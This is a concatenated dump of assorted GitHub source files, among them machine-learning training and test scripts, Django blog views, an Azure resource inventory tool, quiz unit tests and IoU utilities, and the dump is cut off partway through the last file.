BeautifulSoup\"\n )\n raise AlertOnData(\n f\"Scraping of lecture {self.lecture}, {self.url} : \\\nErreur lors de l'initialisation de BeautifulSoup\",\n \"data\",\n 2,\n )\n dict_article[\"textes\"] = []\n dict_article[\"titre\"] = \"\"\n\n list_articles = soup.find_all(\"p\", attrs={\"class\": [\"aFPFTprojetitrarticle\"]})\n\n for article in list_articles:\n dict_article[\"titre\"] = self.get_num_article(article)\n dict_article[\"textes\"] = []\n\n for pastille in self.get_next_pastille(article.find_next_siblings()):\n p = re.compile(r\"\\(\\d+\\)\")\n m = p.match(pastille)\n if m:\n last_pastille_caractere = m.end()\n dict_article[\"textes\"].append(\n pastille[last_pastille_caractere:].strip()\n )\n else:\n dict_article[\"textes\"].append(pastille)\n\n tuple_article = (dict_article[\"titre\"], dict_article[\"textes\"])\n del dict_article[\"textes\"]\n\n yield tuple_article\n\n def transform(self) -> List[Dict[Any, Any]]:\n if self.suffixe == \"\":\n self.logger.info(\"article sans suffixe, utilisation du parseur DEFAULT\")\n parseur = Parseur(self.lecture)\n return parseur.transform()\n else:\n self.logger.info(\"article avec un suffixe\")\n return super().transform()\n","repo_name":"administration-solrep/signale","sub_path":"zam-repondeur-1.17.7/zam_repondeur/services/fetch/an/parser/parseur_plf.py","file_name":"parseur_plf.py","file_ext":"py","file_size_in_byte":6650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13033671704","text":"import argparse\nimport logging\nimport os\nimport random\nimport sys\nimport numpy as np\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom datasets.dataset_synapse import Synapse_dataset\nfrom utils import test_single_volume\n\nfrom models.mewunet import MEWUNet\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--volume_path', type=str,\n default='../data/Synapse/test_vol_h5', help='root dir for validation volume data') # for acdc volume_path=root_dir\nparser.add_argument('--dataset', type=str,\n default='Synapse', help='experiment_name')\nparser.add_argument('--num_classes', type=int,\n default=4, help='output channel of network')\nparser.add_argument('--list_dir', type=str,\n default='./lists/lists_Synapse', help='list dir')\n\nparser.add_argument('--max_iterations', type=int,default=20000, help='maximum epoch number to train')\nparser.add_argument('--max_epochs', type=int, default=30, help='maximum epoch number to train')\nparser.add_argument('--batch_size', type=int, default=1,\n help='batch_size per gpu')\nparser.add_argument('--img_size', type=int, default=224, help='input patch size of network input')\nparser.add_argument('--is_savenii', action=\"store_true\", help='whether to save results during inference')\n\nparser.add_argument('--n_skip', type=int, default=3, help='using number of skip-connect, default is num')\nparser.add_argument('--vit_name', type=str, default='ViT-B_16', help='select one vit model')\n\nparser.add_argument('--test_save_dir', type=str, default='../predictions', help='saving prediction as nii!')\nparser.add_argument('--deterministic', type=int, default=1, help='whether use deterministic training')\nparser.add_argument('--base_lr', type=float, default=0.01, help='segmentation network learning rate')\nparser.add_argument('--seed', type=int, default=1234, help='random seed')\nparser.add_argument('--vit_patches_size', type=int, default=16, help='vit_patches_size, default is 16')\nargs = parser.parse_args()\n\n\ndef inference(args, model, test_save_path=None):\n db_test = args.Dataset(base_dir=args.volume_path, split=\"test_vol\", list_dir=args.list_dir)\n testloader = DataLoader(db_test, batch_size=1, shuffle=False, num_workers=1)\n logging.info(\"{} test iterations per epoch\".format(len(testloader)))\n model.eval()\n metric_list = 0.0\n for i_batch, sampled_batch in tqdm(enumerate(testloader)):\n h, w = sampled_batch[\"image\"].size()[2:]\n image, label, case_name = sampled_batch[\"image\"], sampled_batch[\"label\"], sampled_batch['case_name'][0]\n metric_i = test_single_volume(image, label, model, classes=args.num_classes, patch_size=[args.img_size, args.img_size],\n test_save_path=test_save_path, case=case_name, z_spacing=args.z_spacing)\n metric_list += np.array(metric_i)\n logging.info('idx %d case %s mean_dice %f mean_hd95 %f' % (i_batch, case_name, np.mean(metric_i, axis=0)[0], np.mean(metric_i, axis=0)[1]))\n metric_list = metric_list / len(db_test)\n for i in range(1, args.num_classes):\n logging.info('Mean class %d mean_dice %f mean_hd95 %f' % (i, metric_list[i-1][0], metric_list[i-1][1]))\n performance = np.mean(metric_list, axis=0)[0]\n mean_hd95 = np.mean(metric_list, axis=0)[1]\n logging.info('Testing performance in best val model: mean_dice : %f mean_hd95 : %f' % (performance, mean_hd95))\n return \"Testing Finished!\"\n\n\nif __name__ == \"__main__\":\n\n if not args.deterministic:\n cudnn.benchmark = True\n cudnn.deterministic = False\n else:\n cudnn.benchmark = False\n cudnn.deterministic = True\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n\n dataset_config = {\n 'Synapse': {\n 'Dataset': Synapse_dataset,\n 'volume_path': './data/Synapse/test_vol_h5',\n 'list_dir': './lists/lists_Synapse',\n 'num_classes': 9,\n 'z_spacing': 1,\n },\n }\n dataset_name = args.dataset\n args.num_classes = dataset_config[dataset_name]['num_classes']\n args.volume_path = dataset_config[dataset_name]['volume_path']\n args.Dataset = dataset_config[dataset_name]['Dataset']\n args.list_dir = dataset_config[dataset_name]['list_dir']\n args.z_spacing = dataset_config[dataset_name]['z_spacing']\n\n net = MEWUNet().cuda()\n\n snapshot_path = './our_weights/best-epoch531-mean_dice0.7892-mean_hd9516.4430.pth'\n net.load_state_dict(torch.load(snapshot_path))\n snapshot_name = snapshot_path.split('/')[-1]\n\n log_folder = './test_log/test_log'\n os.makedirs(log_folder, exist_ok=True)\n logging.basicConfig(filename=log_folder + '/'+snapshot_name+\".txt\", level=logging.INFO, format='[%(asctime)s.%(msecs)03d] %(message)s', datefmt='%H:%M:%S')\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))\n logging.info(str(args))\n logging.info(snapshot_name)\n\n if args.is_savenii:\n args.test_save_dir = '../predictions'\n test_save_path = os.path.join(args.test_save_dir, snapshot_name)\n os.makedirs(test_save_path, exist_ok=True)\n else:\n test_save_path = None\n inference(args, net, test_save_path)\n\n\n","repo_name":"JCruan519/MEW-UNet","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"26815085160","text":"import numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimport random\nimg = cv.imread('temp.jpg',0)\ndef histPlot(img):\n hist,bins = np.histogram(img.flatten(),256,[0,256])\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max() / (cdf.max() - cdf.min())\n plt.plot(cdf_normalized, color = 'b')\n plt.hist(img.flatten(),256,[0,256], color = 'r')\n plt.xlim([0,256])\n plt.legend(('cdf','histogram'), loc = 'upper left')\n plt.show()\n\nimg2 = cv.imread('temp.jpg',0)\neq = cv.equalizeHist(img2)\nres = np.hstack((img2,eq))\nhistPlot(img2)\nhistPlot(eq)\nplt.imshow(res)\nplt.show()\n# cdf_m = np.ma.masked_equal(cdf,0)\n# cdf_m = (cdf_m - cdf_m.min())*255/(cdf_m.max()-cdf_m.min())\n# cdf = np.ma.filled(cdf_m,0).astype('uint8')\n# image2 = cdf[img]\n# plt.hist(img.flatten(),256,[0,256], color = 'r')\n# plt.xlim([0,256])\n# plt.legend(('cdf','histogram'), loc = 'upper left')\n# plt.show()","repo_name":"yan-code1/TrainingCode","sub_path":"TrainCode/ImgDeal/histq.py","file_name":"histq.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17622085486","text":"import random\n\nfrom main import create_question_bank\nfrom backend.snake_brain import SnakeBrain\n\n\nclass TestSnakeBrain:\n # random.seed(1), numbers == [5, 19, 3, 9, 4, 16, 15, 21, 13, 7]\n random.seed(1)\n question_bank = create_question_bank()\n random.seed()\n\n def test_snakebrain_instance(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank)\n\n assert brain.questions == TestSnakeBrain.question_bank\n assert brain.question_no == 0\n\n def test_next_question(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank)\n text = brain.next_question() \n\n assert brain.question_no == 1 \n assert text == 'Q. 1: A tuple is one of the four built-in data types in Python. Which of these best describes a tuple?'\n\n def test_has_more_questions(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank)\n brain.question_no = 10\n\n assert brain.has_more_questions() == False\n\n def test_check_answer(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank) \n brain.next_question() \n\n assert brain.check_answer('A tuple is a collection which is unchangeable and ordered.') == True\n assert brain.check_answer('A tuple is a collection which is unchangeable and unordered.') == False\n assert brain.score == 1\n\n def test_check_score(self):\n brain = SnakeBrain(TestSnakeBrain.question_bank)\n brain.next_question() \n\n assert brain.check_answer('A tuple is a collection which is unchangeable and ordered.') == True\n brain.question_no = 10\n assert brain.get_score() == (1, 9, 10)\n \n\n","repo_name":"serioh/Group-One-Nano-Project","sub_path":"Tests/test_snake_brain.py","file_name":"test_snake_brain.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"71304105013","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom . models import *\nfrom .forms import PostForm, CommentForm\n\n\n# def home(request):\n# \treturn render(request, \"base.html\")\n\ndef post_list(request):\n\tposts = Articles.objects.all()\n\treturn render(request, 'post_list.html', {'posts': posts})\n\ndef post_detail(request, pk):\n\tpost = get_object_or_404(Articles, pk=pk)\n\treturn render(request, 'post_detail.html', {'post': post})\n\n# @login_required\ndef post_new(request):\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.user = request.user\n post.timestamp = timezone.now() \n post.save()\n return redirect('post_detail', pk=post.pk)\n else: \n form = PostForm()\n return render(request, 'post_edit.html', {'form': form})\n\n# @login_required\ndef post_edit(request, pk):\n post = get_object_or_404(Articles, pk=pk)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.user = request.user\n post.timestamp = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = PostForm(instance=post)\n return render(request, 'post_edit.html', {'form': form})\n\n# @login_required\ndef post_remove(request, pk):\n post = get_object_or_404(Articles, pk=pk)\n post.delete()\n return redirect('post_list')\n\n\t\ndef add_comment_to_post(request, pk):\n\tpost = get_object_or_404(Articles, pk=pk)\n\tif request.method == \"POST\":\n\t\tform = CommentForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tcomment = form.save(commit = False)\n\t\t\tcomment.id = pk\n\t\t\tcomment.post = post\n\t\t\tcomment.user = request.user\n\t\t\tcomment.timestamp = timezone.now() \n\t\t\tcomment.save()\n\t\t\treturn redirect('post_detail', pk=post.pk)\n\telse:\n\t\tform = CommentForm()\n\treturn render(request, 'add_comment_to_post.html', {'form': form})\n","repo_name":"iamashwinks/GRC_Final","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42035780267","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#plt.rcParams['font.sans-serif'] = ['SimHei']\n#plt.rcParams['axes.unicode_minus'] = False\n\nx = np.linspace(-2 * np.pi, 2 * np.pi, 200) \nf1 = np.sin(x)\nf2 = np.cos(x)\nf3 = np.tan(x)\nf4 = 1 / f3\nf5=1/f2\nf6=1/f1\n#plt.plot(x, f1, label=r'$y=sin(x)$')\n#plt.plot(x, f2, label=r'$y=cos(x)$')\n#plt.plot(x, f3, label=r'$y=tan(x)$')\n#plt.plot(x, f4, label=r'$y=cot(x)$')\nplt.plot(x, f5, label=r'$y=sec(x)$', )\n#plt.plot(x, f6, label=r'$y=csc(x)$', )\n\n#ax = plt.gca()\n#ax.spines['top'].set_color('none')\n#ax.xaxis.set_ticks_position('bottom')\n#ax.yaxis.set_ticks_position('left')\n#ax.spines['bottom'].set_position(('data', 0))\n#ax.spines['left'].set_position(('data', 0))\n\nplt.xlim(x.min() * 1.1, x.max() * 1.1) # limit x range\nplt.ylim(-4, 4) # limit y range\n#plt.xticks([-2 * np.pi, -3 * np.pi / 2, -np.pi, -np.pi / 2, 0, np.pi / 2, np.pi, 3 * np.pi / 2, 2 * np.pi],\n #[r'$-2\\pi$', r'$-3\\pi/2$', r'$-\\pi$', r'$-\\pi/2$', r'$0$', r'$\\pi/2$', r'$\\pi$', r'$3\\pi/2$', r'$2\\pi$'])\n#plt.legend(loc='best')\nplt.show()\n","repo_name":"OuJunLin/Python-math_graph","sub_path":"Test04.py","file_name":"Test04.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70904120052","text":"import os\n\nclass Writer:\n def write_file(self, write_in, tmp_file, data, mode):\n print(\"Going to write: \" + data + \" in file:\" + write_in)\n #Writes file 'write_in' with 'data' using a temp file passed\n f = open(tmp_file, mode)\n f.write(data)\n f.flush()\n os.fsync(f.fileno()) \n f.close()\n\n #Is atomic\n os.rename(tmp_file, write_in)\n print(\"Writer finished working\")","repo_name":"fedefunes96/tp3-sistemas-distribuidos","sub_path":"cluster_manager/writer/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5703817219","text":"from typing import List\nimport os, json\n\nfrom banyan.ext.iaas.base import IaasAccount, IaasResource, IaasInstance, IaasRegion, IaasConf, IaasController\n \nfrom azure.identity import DefaultAzureCredential\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.mgmt.compute import ComputeManagementClient\nfrom azure.mgmt.network import NetworkManagementClient\n\n\nclass AzureController(IaasController):\n def __init__(self, filter_by_resource_group: str, filter_by_location: str = None, filter_by_tag_name: str = None):\n self._provider = 'azure'\n _azure_subscription_id = os.getenv('AZURE_SUBSCRIPTION_ID')\n _azure_tenant_id = os.getenv('AZURE_TENANT_ID')\n _azure_client_id = os.getenv('AZURE_CLIENT_ID')\n _azure_client_secret = os.getenv('AZURE_CLIENT_SECRET')\n if not _azure_subscription_id:\n _creds = IaasConf.get_creds(self._provider)\n _azure_subscription_id = _creds['azure_subscription_id']\n _azure_tenant_id = _creds['azure_tenant_id']\n _azure_client_id = _creds['azure_client_id']\n _azure_client_secret = _creds['azure_client_secret']\n\n try:\n os.environ['AZURE_SUBSCRIPTION_ID'] = _azure_subscription_id\n os.environ['AZURE_TENANT_ID'] = _azure_tenant_id\n os.environ['AZURE_CLIENT_ID'] = _azure_client_id\n os.environ['AZURE_CLIENT_SECRET'] = _azure_client_secret \n self._credential = DefaultAzureCredential() # needs env vars\n self._subscription_id = _azure_subscription_id # for clients\n resource_client = ResourceManagementClient(self._credential, self._subscription_id)\n except Exception as ex:\n print('AzureSDKError > %s' % ex.args[0])\n raise\n self._filter_by_resource_group = filter_by_resource_group\n self._filter_by_location = filter_by_location\n self._filter_by_tag_name = filter_by_tag_name\n\n try:\n self._resource_group_list = resource_client.resource_groups.list()\n except Exception as ex:\n print('AzureControllerError > %s' % ex.args[0])\n raise\n\n\n def list_vm(self):\n res_type = 'vm'\n compute_client = ComputeManagementClient(self._credential, self._subscription_id)\n network_client = NetworkManagementClient(self._credential, self._subscription_id)\n\n # VMs in all resource groups\n vm_list = compute_client.virtual_machines.list_all()\n\n instances: List[IaasResource] = list()\n for vm in list(vm_list):\n #print(json.dumps(vm.as_dict(), indent=4))\n vm_loc = vm.location\n vm_tags = vm.tags or dict()\n vm_reference = vm.id.split('/')\n vm_rg = vm_reference[4]\n ni_reference = vm.network_profile.network_interfaces[0].id.split('/')\n ni_name = ni_reference[8]\n\n # implement filtering\n if self._filter_by_resource_group != 'all' and self._filter_by_resource_group != vm_rg:\n continue\n if self._filter_by_location and self._filter_by_location != vm_loc:\n continue\n if self._filter_by_tag_name and not vm_tags.get(self._filter_by_tag_name):\n continue\n\n # check network interface for address\n net_interface = network_client.network_interfaces.get(vm_rg, ni_name)\n #print(json.dumps(net_interface.as_dict(), indent=4))\n # assume only 1 NIC\n ip_config = net_interface.ip_configurations[0]\n private_ip = ip_config.private_ip_address or ''\n public_ip = ''\n if ip_config.public_ip_address:\n pub_ip_reference = ip_config.public_ip_address.id.split('/')\n pub_ip_group = pub_ip_reference[4]\n pub_ip_name = pub_ip_reference[8]\n pub_ip = network_client.public_ip_addresses.get(pub_ip_group, pub_ip_name)\n #print(json.dumps(pub_ip.as_dict(), indent=4))\n public_ip = pub_ip.ip_address\n\n res_inst = IaasInstance(\n type = res_type,\n id = vm.id,\n name = vm.name,\n private_ip = private_ip,\n public_ip = public_ip\n )\n\n res_acct = IaasAccount('resource_group', vm_rg)\n res_regn = IaasRegion('location', vm_loc)\n\n res = IaasResource(\n provider = self._provider,\n account = res_acct,\n region = res_regn,\n instance = res_inst,\n tags = vm_tags\n )\n instances.append(res)\n\n return instances\n\n\n def list_lb(self):\n res_type = 'lb'\n network_client = NetworkManagementClient(self._credential, self._subscription_id)\n\n lb_list = network_client.load_balancers.list_all()\n\n instances: List[IaasResource] = list()\n for lb in list(lb_list):\n #print(json.dumps(lb.as_dict(), indent=4))\n lb_loc = lb.location\n lb_tags = lb.tags or dict()\n lb_reference = lb.id.split('/')\n lb_rg = lb_reference[4]\n\n # implement filtering\n if self._filter_by_resource_group != 'all' and self._filter_by_resource_group != lb_rg:\n continue \n if self._filter_by_location and self._filter_by_location != lb_loc:\n continue\n if self._filter_by_tag_name and not lb_tags.get(self._filter_by_tag_name):\n continue\n\n ip_config = lb.frontend_ip_configurations[0]\n private_ip = ip_config.private_ip_address or ''\n public_ip = ''\n if ip_config.public_ip_address:\n pub_ip_reference = ip_config.public_ip_address.id.split('/')\n pub_ip_group = pub_ip_reference[4]\n pub_ip_name = pub_ip_reference[8]\n pub_ip = network_client.public_ip_addresses.get(pub_ip_group, pub_ip_name)\n #print(json.dumps(pub_ip.as_dict(), indent=4))\n public_ip = pub_ip.ip_address\n\n res_ports = list()\n for lb_rule in list(lb.load_balancing_rules):\n res_ports.append(f'{lb_rule.frontend_port}/{lb_rule.protocol}')\n\n res_inst = IaasInstance(\n type = res_type,\n id = lb.id,\n name = lb.name,\n public_ip = public_ip,\n private_ip = private_ip,\n ports = res_ports\n )\n\n res_acct = IaasAccount('resource_group', lb_rg)\n res_regn = IaasRegion('location', lb_loc)\n\n res = IaasResource(\n provider = self._provider,\n account = res_acct,\n region = res_regn,\n instance = res_inst,\n tags = lb_tags\n )\n instances.append(res)\n\n return instances\n\n\nif __name__ == '__main__':\n azr = AzureController('all', None, 'banyan:discovery')\n my_vms = azr.list_vm()\n print(my_vms)\n my_lbs = azr.list_lb()\n print(my_lbs)\n\n","repo_name":"banyansecurity/pybanyan","sub_path":"banyan/ext/iaas/azure_cloud.py","file_name":"azure_cloud.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"18878743282","text":"import numpy as np \nimport torch\nimport torch.nn as nn \nimport torchvision.transforms as transforms\n# Other Library\nfrom datetime import datetime\n# Self-Defined Files\nimport Utils\nimport Config\nimport Recorder\n# Models\nimport AlexNet, ResNet, LeNet5, MobileNet, NiNet\nimport SqueezeNet, myNet\n\n# Recorder Instantiate\nmyRecorder = Recorder.Recorder()\ntorch.cuda.empty_cache()\n\n# Fetch Models, Init & Copy\n# model = ResNet.Fetch_ResNet('ResNet8v1')\n# model = AlexNet.AlexNet()\n# model = LeNet5.LeNet5()\n# model = MobileNet.MobileNetv1()\n# model = NiNet.NetworkInNetwork()\n# model = SqueezeNet.Fetch_SqueezeNet('Bypass_Simple')\n# model = SqueezeNet.SqueezeNet('Basic')\nmodel = myNet.myNet(ResidualDepth = 2, DepthShrink = 0.5)\n\n\n\n# print(model)\nprint(sum(p.numel() for p in model.parameters() if p.requires_grad))\n# raise ValueError('aaaaaa')\n\n\nmodel.apply(Utils.weight_init)\nmyRecorder.add_record_('Model', model.model_name)\nmyRecorder.add_record_('Model Size Trainable', sum(p.numel() for p in model.parameters() if p.requires_grad))\nmyRecorder.add_record_('Model Size Total', sum(p.numel() for p in model.parameters()))\nmyRecorder.add_record_('Model Structure', [layer[2:] for layer in str(model).split('\\n')[1:-1]])\n\n\n# Define some Hyperparameters\nbatch_size = 128\ntotal_epoch = 350\ndevice = Utils.check_device()\nmodel.to(device)\nmyRecorder.add_record_('Batch Size', batch_size)\nmyRecorder.add_record_('Total Epoch', total_epoch)\nmyRecorder.add_record_('Device', str(device))\n\n# Loss Function\nlossFunc = nn.CrossEntropyLoss()\nmyRecorder.add_record_('Loss Function', str(lossFunc)[:-2])\n# Optimizer & Learning Rate Scheduler\noptim_dict = Config.Optimizer['SGD']\nscheduler_dict = Config.lr_Scheduler['MultiStepLR']\noptim, scheduler = Utils.optim_init(model, optim_dict, scheduler_dict)\nmyRecorder.add_record_('Optimizer', {'Type': optim_dict['optim_TYPE'],\n 'State': optim.state_dict()['state'],\n 'param_groups': optim.state_dict()['param_groups'][0]})\nmyRecorder.add_record_('lr Scheduler', {'Type': scheduler_dict['schedule_TYPE'],\n 'State': scheduler.state_dict()})\n\n# DataSet Fetch & Augmentation\nTrain_transform = transforms.Compose([transforms.RandomCrop(32, padding = 4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))])\nTest_transform = transforms.Compose([ transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.247, 0.243, 0.261))])\nDataLoader, label = Utils.DatasetLoader('CIFAR10', Train_transform, Test_transform, batch_size, TrainShrink = 0.03125)\nmyRecorder.add_record_('TrainSet Size', 0.03125)\nmyRecorder.add_record_('Train Transform', [trans[4:] for trans in str(Train_transform).split('\\n')[1:-1]])\nmyRecorder.add_record_('Test Transform', [trans[4:] for trans in str(Test_transform).split('\\n')[1:-1]])\nmyRecorder.add_record_('Dataset', 'CIFAR10')\n\n\n# Starts Training\n# Record Start Time, this serves as time stamp for all the files stored\nTimeStamp = str(datetime.now())\nStartTime = datetime.now()\ntrain_acc, test_acc, loss = Utils.train(model, DataLoader, lossFunc, optim, device, total_epoch, scheduler)\nmyRecorder.add_record_('TrainingTime', str(datetime.now() - StartTime))\nStartTime = datetime.now()\nclass_prob, ConfuMx = Utils.fine_validate(model, DataLoader[1], device, label)\nmyRecorder.add_record_('InferenceTime', str(datetime.now() - StartTime))\nUtils.visualize_plt('../save/' + TimeStamp, train_acc, test_acc, loss)\nUtils.Save_Model(model, '../save/' + TimeStamp)\n# Save Config into JSON\nmyRecorder.add_record_('Performance', { 'Best_Train': max(train_acc), 'Final_Train': train_acc[-1],\n 'Best_Test' : max(test_acc), 'Final_Test': test_acc[-1],\n 'Best_Loss': max(loss), 'Final_Loss': loss[-1]})\nmyRecorder.add_record_('Class Performance', {label[i]: class_prob[i] for i in range(len(label))})\nmyRecorder.add_record_('Confusion Matrix', {label[i]: str(ConfuMx[i]) for i in range(len(label))})\n\n# Clean Up\nmyRecorder.json_dump_('../save/' + TimeStamp)\ntorch.cuda.empty_cache()\n","repo_name":"ChengyaoWang/PlayGround","sub_path":"PyTorchModels/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4623811892","text":"consoante = []\nvogal = []\nc = 0\nfor i in range(1,11):\n x = str(input(\"Digite uma letra: \"))\n if len(x)>= 2:\n print(\"Eu disse uma letra\")\n break\n if x == 'a' or x == 'e' or x == 'i' or x == 'o' or x == 'u':\n vogal.append(x)\n else:\n consoante.append(x)\n c = c + 1\nprint(\"O número de consoantes é de %i\"%c)\nprint(\"E as consoantes são\")\nprint(consoante)\n","repo_name":"Davi-Augusto-Schmidt/Programas-e-exercicios","sub_path":"Python/4 - Exercicios com listas/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2922677244","text":"from django.forms import ModelForm\nfrom django import forms\nfrom billing.models import Product,Purchase,Order,OrderLines\n\nclass ProductCreateForm(ModelForm):\n class Meta:\n model=Product\n fields=[\"product_name\"]\n\nclass PurchaseCreateForm(ModelForm):\n class Meta:\n\n model = Purchase\n fields = [\"product\",\"qty\",\"purchase_price\",\"selling_price\"]\n # widgets = {\"qty\": forms.TextInput(attrs={'class': 'form-control'})}\n # widgets = {\"product\": forms.TextInput(attrs={'class': 'form-control'})}\n # widgets = {\"purchase_price\": forms.TextInput(attrs={'class': 'form-control'})}\n\n\nclass OrderCreateForm(ModelForm):\n billnumber = forms.CharField(widget=forms.TextInput(attrs={'readonly': 'readonly'}))\n class Meta:\n model = Order\n fields = [\"billnumber\",\"customer_name\",\"phone_number\"]\n\nclass OrderlinesCreateForm(forms.Form):\n # fields = [\"bill_number\",\"product_name\",\"product_qty\"]\n bill_number = forms.CharField(widget=forms.TextInput(attrs={'readonly': 'readonly'}))\n # bill_number=forms.CharField()\n queryset = Purchase.objects.all().filter(qty__gte=1).values_list('product__product_name', flat=True)\n\n choices = [(name, name) for name in queryset]\n\n product_name=forms.ChoiceField(choices=choices,required=False,widget=forms.Select())\n product_qty=forms.IntegerField()\n\n class Meta:\n model=OrderLines\n fields = [\"bill_number\", \"product_name\", \"product_qty\"]\n\n","repo_name":"Sibinvarghese/GroceryBillingSystem","sub_path":"billing/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38810628975","text":"from typing import Tuple, Optional\n\nimport numpy as np\n\n\ndef box_iou(\n box_true: Tuple[float, float, float, float],\n box_detection: Tuple[float, float, float, float]\n) -> Optional[float]:\n \"\"\"\n Compute Intersection over Union of two bounding boxes - `box_true` and `box_detection`. Both boxes are expected to be\n tuples in `(x_min, y_min, x_max, y_max)` format.\n\n Args:\n box_true: `tuple` representing ground-truth bounding boxes.\n box_detection: `tuple` representing detection bounding boxes.\n\n Returns:\n iou: `float` value between 0 and 1. `None` if union is equal to 0.\n\n Example:\n ```\n >>> from onemetric.cv.utils.iou import box_iou\n\n >>> iou = box_iou_batch(\n ... boxes_true=(0., 0., 1., 1.),\n ... boxes_detection=(0.25, 0., 1.25, 1.)\n ... )\n\n >>> iou\n ... 0.6\n ```\n \"\"\"\n _validate_box(box=box_true)\n _validate_box(box=box_detection)\n\n x_min_true, y_min_true, x_max_true, y_max_true = box_true\n x_min_detection, y_min_detection, x_max_detection, y_max_detection = box_detection\n\n x_min = max(x_min_true, x_min_detection)\n y_min = max(y_min_true, y_min_detection)\n x_max = min(x_max_true, x_max_detection)\n y_max = min(y_max_true, y_max_detection)\n\n area_intersection = max(0.0, x_max - x_min) * max(0.0, y_max - y_min)\n area_true = (x_max_true - x_min_true) * (y_max_true - y_min_true)\n area_detection = (x_max_detection - x_min_detection) * (y_max_detection - y_min_detection)\n area_union = area_true + area_detection - area_intersection\n\n if area_union == 0:\n return None\n\n return area_intersection / area_union\n\n\n# Updated version of box_iou_batch from https://github.com/kaanakan/object_detection_confusion_matrix\n\n\ndef box_iou_batch(boxes_true: np.ndarray, boxes_detection: np.ndarray) -> np.ndarray:\n \"\"\"\n Compute Intersection over Union of two sets of bounding boxes - `boxes_true` and `boxes_detection`. Both sets of\n boxes are expected to be in `(x_min, y_min, x_max, y_max)` format.\n\n Args:\n boxes_true: 2d `np.ndarray` representing ground-truth boxes. `shape = (N, 4)` where N is number of true objects.\n boxes_detection: 2d `np.ndarray` representing detection boxes. `shape = (M, 4)` where M is number of detected objects.\n\n Returns:\n iou: 2d `np.ndarray` representing pairwise IoU of boxes from `boxes_true` and `boxes_detection`. `shape = (N, M)` where N is number of true objects and M is number of detected objects.\n\n Example:\n ```\n >>> import numpy as np\n\n >>> from onemetric.cv.utils.iou import box_iou_batch\n\n >>> boxes_true = np.array([\n ... [0., 0., 1., 1.],\n ... [2., 2., 2.5, 2.5]\n ... ])\n >>> boxes_detection = np.array([\n ... [0., 0., 1., 1.],\n ... [2., 2., 2.5, 2.5]\n ... ])\n >>> iou = box_iou_batch(boxes_true=boxes_true, boxes_detection=boxes_detection)\n\n >>> iou\n ... np.array([\n ... [1., 0.],\n ... [0., 1.]\n ... ])\n ```\n \"\"\"\n\n _validate_boxes_batch(boxes_batch=boxes_true)\n _validate_boxes_batch(boxes_batch=boxes_detection)\n\n def box_area(box):\n return (box[2] - box[0]) * (box[3] - box[1])\n\n area_true = box_area(boxes_true.T)\n area_detection = box_area(boxes_detection.T)\n\n top_left = np.maximum(boxes_true[:, None, :2], boxes_detection[:, :2])\n bottom_right = np.minimum(boxes_true[:, None, 2:], boxes_detection[:, 2:])\n\n area_inter = np.prod(np.clip(bottom_right - top_left, a_min=0, a_max=None), 2)\n return area_inter / (area_true[:, None] + area_detection - area_inter)\n\n\ndef mask_iou(mask_true: np.ndarray, mask_detection: np.ndarray) -> Optional[float]:\n \"\"\"\n Compute Intersection over Union of two masks - mask_true and mask_detection. Shapes of mask_true and\n mask_detection should be identical. Both arrays are expected to be `np.uint8` type and contain binary values (0 or 1).\n\n Args:\n mask_true: 2d `np.ndarray` representing ground-truth mask.\n mask_detection: 2d `np.ndarray` representing detection mask.\n\n Returns:\n iou: `float` value between 0 and 1. `None` if union is equal to 0.\n\n Example:\n ```\n >>> import numpy as np\n\n >>> from onemetric.cv.utils.iou import 